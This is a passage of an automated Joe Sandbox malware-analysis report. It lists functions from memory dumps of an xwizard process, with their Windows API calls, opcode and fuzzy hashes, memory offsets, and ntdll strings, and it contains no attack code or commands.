                                                                                      • Instruction Fuzzy Hash: 0301C0B6205108BFCB04DE8DDC94EDB77AEAF8C754F008208BA09E3240D630F8518BA4
                                                                                      Function 028A9E30 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 028A9E75
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3106885173.00000000028A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_28a0000_xwizard.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateThread
                                                                                      • String ID:
                                                                                      • API String ID: 2422867632-0
                                                                                      • Opcode ID: 5aed755dcce69156b0e488110b0e74f2e360b9f87b2299a8e16f1fd7f65ba8e5
                                                                                      • Instruction ID: bfd87e5086de9e262325bd1bc0da6afb13d4c78479a2b6faaefcfc7c7e7165fb
                                                                                      • Opcode Fuzzy Hash: 5aed755dcce69156b0e488110b0e74f2e360b9f87b2299a8e16f1fd7f65ba8e5
                                                                                      • Instruction Fuzzy Hash: 1EF06D7B38020436E26061EDAC02FD7B78E9B80B61F25442AF70DEB1C0DAA1F40187A6
                                                                                      Function 028A9E2A Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 028A9E75
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3106885173.00000000028A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_28a0000_xwizard.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateThread
                                                                                      • String ID:
                                                                                      • API String ID: 2422867632-0
                                                                                      • Opcode ID: 69a141f6aca1ffc1e29d274346d1c7ad19c6c731b16c7713d9cb284ead07ca8e
                                                                                      • Instruction ID: 4f452b21ff57795993ab295ea120c7886c9e2c0698e271a9909903d4ee93e3b5
                                                                                      • Opcode Fuzzy Hash: 69a141f6aca1ffc1e29d274346d1c7ad19c6c731b16c7713d9cb284ead07ca8e
                                                                                      • Instruction Fuzzy Hash: 0DF06D7E28020076E27066999C02FD7B69E9F84B61F25441AF74DEB2C4DAA1F90187A6
                                                                                      Function 028C98E0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RtlAllocateHeap.NTDLL(028B1D39,?,028C5BAF,028B1D39,028C58BF,028C5BAF,?,028B1D39,028C58BF,00001000,?,?,00000000), ref: 028C991F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3106885173.00000000028A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_28a0000_xwizard.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1279760036-0
                                                                                      • Opcode ID: 07a1999492f3a384fb03a1ec5612f51b1d0cd58c1b28e9d7f09d6b5ab6ef1d80
                                                                                      • Instruction ID: 9ca9915fddfcc734bb69bd0c80b45b39a270e846496e23c2e57595eec7275d9a
                                                                                      • Opcode Fuzzy Hash: 07a1999492f3a384fb03a1ec5612f51b1d0cd58c1b28e9d7f09d6b5ab6ef1d80
                                                                                      • Instruction Fuzzy Hash: 32E06D79200204BFDA14EE98DC45F9B37AEEFC5714F004429F908A7240D670B8108AB5
                                                                                      Function 028C9930 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,00012891,00000007,00000000,00000004,00000000,028B40CF,000000F4), ref: 028C996F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3106885173.00000000028A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_28a0000_xwizard.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FreeHeap
                                                                                      • String ID:
                                                                                      • API String ID: 3298025750-0
                                                                                      • Opcode ID: 08fc148778f86281705d314da897c7392c6dfed811d22eb47e2e118810cfa951
                                                                                      • Instruction ID: f11d8f46282676e061e2a602a5187f50a00d3f9aaab2b1269afb585e8f576e2f
                                                                                      • Opcode Fuzzy Hash: 08fc148778f86281705d314da897c7392c6dfed811d22eb47e2e118810cfa951
                                                                                      • Instruction Fuzzy Hash: 9BE06D792002047FD614EE59DC45F9B37ADEFC5714F004418F948A7240C770B8108BB6
                                                                                      Function 028B85B0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 028B85DC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3106885173.00000000028A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_28a0000_xwizard.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AttributesFile
                                                                                      • String ID:
                                                                                      • API String ID: 3188754299-0
                                                                                      • Opcode ID: cd4bbd0a88bbd8c02ca4391cbafc45fe7828a22326bb7f36479dc0ff0b840b32
                                                                                      • Instruction ID: 481b0537b8aaa969b29a6b56f471901e5e68154f65d9b5cd1767a5ab3fe25ffd
                                                                                      • Opcode Fuzzy Hash: cd4bbd0a88bbd8c02ca4391cbafc45fe7828a22326bb7f36479dc0ff0b840b32
                                                                                      • Instruction Fuzzy Hash: 7BE0267D25030427EB206BA8DC46FA2334EAF48728F184668F82CCB7C1E778F4418250
                                                                                      Function 028B8397 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,028B2020,028C81FF,028C58BF,028B1FF0), ref: 028B83D3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3106885173.00000000028A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_28a0000_xwizard.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorMode
                                                                                      • String ID:
                                                                                      • API String ID: 2340568224-0
                                                                                      • Opcode ID: 1ccbba005d79f72681bfe66eb1b56d26b2fff0d84a52d90d18770aa804e705cc
                                                                                      • Instruction ID: 109681e75dc0def101f9b7f3fc2680d28e2ae752cffccb705e37a57462db0e63
                                                                                      • Opcode Fuzzy Hash: 1ccbba005d79f72681bfe66eb1b56d26b2fff0d84a52d90d18770aa804e705cc
                                                                                      • Instruction Fuzzy Hash: 79E0C27E28470437F691F6A49C1AF16399EEB05654F68807CF98CEB2C2DE92D1148B52
                                                                                      Function 028B83A0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,028B2020,028C81FF,028C58BF,028B1FF0), ref: 028B83D3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3106885173.00000000028A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_28a0000_xwizard.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorMode
                                                                                      • String ID:
                                                                                      • API String ID: 2340568224-0
                                                                                      • Opcode ID: 0fd5efbe11e0965c68ccefc9f7f148cf17426eb5d851671f63019043442af12c
                                                                                      • Instruction ID: b38c0c61ae17fcadcbe5db4e1d4dfca21ff2e49a7c54c31e0fe787aa4337640b
                                                                                      • Opcode Fuzzy Hash: 0fd5efbe11e0965c68ccefc9f7f148cf17426eb5d851671f63019043442af12c
                                                                                      • Instruction Fuzzy Hash: FED02B7D28030037F650A2A89C06F12318EAB04750F148028B90CD72C1DD50E0004A62
                                                                                      Function 028B10EB Relevance: 1.5, APIs: 1, Instructions: 20threadwindowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000), ref: 028B10FD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3106885173.00000000028A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_28a0000_xwizard.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: MessagePostThread
                                                                                      • String ID:
                                                                                      • API String ID: 1836367815-0
                                                                                      • Opcode ID: 8ec3775f0e40b3bee5156ff5a0e22553932c57dfa4200919125e76a782e4c981
                                                                                      • Instruction ID: bb0625f37fbde107d8564e5e700bf1a80273551f57eeb83c49da93ce35288d51
                                                                                      • Opcode Fuzzy Hash: 8ec3775f0e40b3bee5156ff5a0e22553932c57dfa4200919125e76a782e4c981
                                                                                      • Instruction Fuzzy Hash: 4DD0A73AB4024C30EA3241545C43FFEB76C8F41A40F00006BFB08F81C2DA81141606A6
                                                                                      Function 047D2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 4cf55e9b89eb0e2c2ae4d87946e3eb83340900163d602ffcd0cf79035ae789be
                                                                                      • Instruction ID: 57df64a5c42254a19fc7cfeb81c6bc5aec495e8fdeadec86496b270deee7fe6a
                                                                                      • Opcode Fuzzy Hash: 4cf55e9b89eb0e2c2ae4d87946e3eb83340900163d602ffcd0cf79035ae789be
                                                                                      • Instruction Fuzzy Hash: 9CB09B719015C5C5FB11F760460871779106BD0705F16C171D2070761F4738D5D5F176

                                                                                      Non-executed Functions

                                                                                      Function 04AB04E1 Relevance: .1, Instructions: 149COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108672426.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4ab0000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6a2c2f2dc23a9e2ae1e8bc3fc8a7595a8ee71423ade140d08b901e0632799e6a
                                                                                      • Instruction ID: 28f4fd59b410650b256c43e281a7223b45696c66af875af704c96484cfbf5912
                                                                                      • Opcode Fuzzy Hash: 6a2c2f2dc23a9e2ae1e8bc3fc8a7595a8ee71423ade140d08b901e0632799e6a
                                                                                      • Instruction Fuzzy Hash: F341E37060CB094FD368AF6890816B7B3E6FB89304F50862DD8CAC3653EB74F84286C5
                                                                                      Function 047D2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: ___swprintf_l
                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                      • API String ID: 48624451-2108815105
                                                                                      • Opcode ID: a32a763987dd7dd8cc7877ee5afad0d2b09b3c7d692f1c55657e6a693b98ae87
                                                                                      • Instruction ID: 22de4f3df5bf9cc9deb5cab215b5011425ceaee26e1401b045d01fdba9ab4f62
                                                                                      • Opcode Fuzzy Hash: a32a763987dd7dd8cc7877ee5afad0d2b09b3c7d692f1c55657e6a693b98ae87
                                                                                      • Instruction Fuzzy Hash: 5D510AB1B14256BFDB20DFA9C88097EF7B8BB08204710C669E455E7746E274FE018BA0
                                                                                      Function 04842410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: ___swprintf_l
                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                      • API String ID: 48624451-2108815105
                                                                                      • Opcode ID: 419a2db24aa41b2dc479f4349e8db01359d5fa632ef0e639e5bba46c79fb69e9
                                                                                      • Instruction ID: a71457b1bffb4751888cda59f66cb4077c03f57ffa54d9357fadc8f701a5e5ce
                                                                                      • Opcode Fuzzy Hash: 419a2db24aa41b2dc479f4349e8db01359d5fa632ef0e639e5bba46c79fb69e9
                                                                                      • Instruction Fuzzy Hash: A2510671A0464DAFDB30DE9CC89097FB7F8EF88244B008999F495D3641E6B4FA40CB60
                                                                                      Function 047C7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04804742
                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04804725
                                                                                      • Execute=1, xrefs: 04804713
                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04804655
                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 04804787
                                                                                      • ExecuteOptions, xrefs: 048046A0
                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 048046FC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                      • API String ID: 0-484625025
                                                                                      • Opcode ID: dc13de2faff520cad151e05859a78107af40f83a776f165144c78589417e0f32
                                                                                      • Instruction ID: ab6313470633d02c2e18fa4962ecac7549c0efedb0c630b39e0a46002ea2eaa4
                                                                                      • Opcode Fuzzy Hash: dc13de2faff520cad151e05859a78107af40f83a776f165144c78589417e0f32
                                                                                      • Instruction Fuzzy Hash: 0A51167164021EABEF14AAA9DC89BA977B8EF04704F4405ADE605A7390EB70BE458F50
                                                                                      Function 04866940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                      • Instruction ID: 92ab9a8e4ba637662a36ff7886ed40691e4ad024b1d7116561c6950694aa0936
                                                                                      • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                      • Instruction Fuzzy Hash: C4021471508381AFD345CF18C494A6ABBE5EFC8708F148E2DF98A9B254EB71E945CB42
                                                                                      Function 047DB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: __aulldvrm
                                                                                      • String ID: +$-$0$0
                                                                                      • API String ID: 1302938615-699404926
                                                                                      • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                      • Instruction ID: 1d2c29b8b9de64d724dd1a1ebbad4a795d652bcc6124bfdd1da3950eaca96a10
                                                                                      • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                      • Instruction Fuzzy Hash: 3581E130E252499FDF24CF68C8907FEBBB5AF45360F1A425AE861A7391D734B840CB60
                                                                                      Function 048420E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: ___swprintf_l
                                                                                      • String ID: %%%u$[$]:%u
                                                                                      • API String ID: 48624451-2819853543
                                                                                      • Opcode ID: aa6566e79a17c7d5e28b420ef2ead60dae3c32246fb0d9a65ea9381993ae3faf
                                                                                      • Instruction ID: 9954cbf3bb2ecb198fc97dfec3d1b6d789a2f8a759343377221ef8110f2caaff
                                                                                      • Opcode Fuzzy Hash: aa6566e79a17c7d5e28b420ef2ead60dae3c32246fb0d9a65ea9381993ae3faf
                                                                                      • Instruction Fuzzy Hash: FC215676A0011D9BDB10DFA9C8449BEB7F8EF84784F040656F915D3200E730F901CBA1
                                                                                      Function 047BF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • RTL: Re-Waiting, xrefs: 0480031E
                                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 048002BD
                                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 048002E7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                      • API String ID: 0-2474120054
                                                                                      • Opcode ID: f2b11d7a1b77b64b67efb8c23f15d02fbee42c5bcde58051d99ecaab813151f6
                                                                                      • Instruction ID: 2dfffca65884f9dec258acf6251fd3bce5982128f2a08f550c6b4cf024587c94
                                                                                      • Opcode Fuzzy Hash: f2b11d7a1b77b64b67efb8c23f15d02fbee42c5bcde58051d99ecaab813151f6
                                                                                      • Instruction Fuzzy Hash: B5E1BD306147419FD725CF28DC84B6AB7E0AB89718F144A5DE9A5CB3E1E774E844CB82
                                                                                      Function 047CBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • RTL: Re-Waiting, xrefs: 04807BAC
                                                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04807B7F
                                                                                      • RTL: Resource at %p, xrefs: 04807B8E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                      • API String ID: 0-871070163
                                                                                      • Opcode ID: 2bf7d941e0a98fa692235a4e320067167db3360f36d61a55c4557025b3e9513f
                                                                                      • Instruction ID: 57969e09a7a95a9e0b78e4861aed8b9efb63837c2848bdbaca3cb9cfd703ba7e
                                                                                      • Opcode Fuzzy Hash: 2bf7d941e0a98fa692235a4e320067167db3360f36d61a55c4557025b3e9513f
                                                                                      • Instruction Fuzzy Hash: 9E41BD317007029FDB24DE29DC51B6AB7E5EB88714F100A2DF95ADB780DB71F8458B91
                                                                                      Function 047CB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0480728C
                                                                                      Strings
                                                                                      • RTL: Re-Waiting, xrefs: 048072C1
                                                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04807294
                                                                                      • RTL: Resource at %p, xrefs: 048072A3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                      • API String ID: 885266447-605551621
                                                                                      • Opcode ID: 8b29b8747785d36a756b319bc422f7a20ac15de63621c54a9e5651ec4678e07a
                                                                                      • Instruction ID: 4c962a64e8c1a11d3513c4cc65334912f5eb4c3c1a887a1375b316fd49adbd1c
                                                                                      • Opcode Fuzzy Hash: 8b29b8747785d36a756b319bc422f7a20ac15de63621c54a9e5651ec4678e07a
                                                                                      • Instruction Fuzzy Hash: 9F41EF71704216ABD720DE25DC42B66B7A5FB84714F104B1DFA56EB380EB30F8528BD1
                                                                                      Function 04842300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: ___swprintf_l
                                                                                      • String ID: %%%u$]:%u
                                                                                      • API String ID: 48624451-3050659472
                                                                                      • Opcode ID: 4fb75de46081f82ec2f8db600c379e1df94fc562e7c62f3c8311557325e7f3ae
                                                                                      • Instruction ID: ae8647bd267320a5a19d1ba1a0846ec3ccbd85b241b9479a6a564110fecd7e70
                                                                                      • Opcode Fuzzy Hash: 4fb75de46081f82ec2f8db600c379e1df94fc562e7c62f3c8311557325e7f3ae
                                                                                      • Instruction Fuzzy Hash: 7D31457260061D9FDB20DF2DCC44BAEB7B8EB44754F444995E849E3240EB31BA448B61
                                                                                      Function 047D7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: __aulldvrm
                                                                                      • String ID: +$-
                                                                                      • API String ID: 1302938615-2137968064
                                                                                      • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
